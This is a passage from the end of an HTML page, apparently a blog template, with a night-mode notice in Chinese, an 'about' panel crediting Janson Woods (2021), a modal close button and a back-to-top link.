          <div id="collapseTwo" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingTwo">
          <div class="panel-body">
            夜间模式已经开启，再次单击按钮即可关闭 
          </div>
        </div>

        <div>
            <a data-toggle="collapse" data-parent="#accordion" href="#collapseThree" aria-expanded="true" aria-controls="collapseThree">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;关 于&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a>
        </div>
         <div id="collapseThree" class="panel-collapse collapse" role="tabpanel" aria-labelledby="headingThree">
          <div class="panel-body">
            SCS
          </div>
          <div class="panel-body">
            Copyright © 2021 Janson Woods All Rights Reserved.
          </div>
        </div>
      </div>


      <hr style="margin-top:0px; margin-bottom:0px; width:80%; border-top: 1px solid #000;">
      <hr style="margin-top:2px; margin-bottom:0px; width:80%; border-top: 3px solid #000;">
      <div class="modal-footer">
        <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
      </div>
    </div>
  </div>
</div>
  
  <a id="rocket" href="#top" class=""></a>
  <script type="text/javascript" src="/js/totop.js?v=1.0.0" async=""></script>
  
    <a id="menu-switch"><i class="fa fa-bars fa-lg"></i></a>
  
</body>
</html>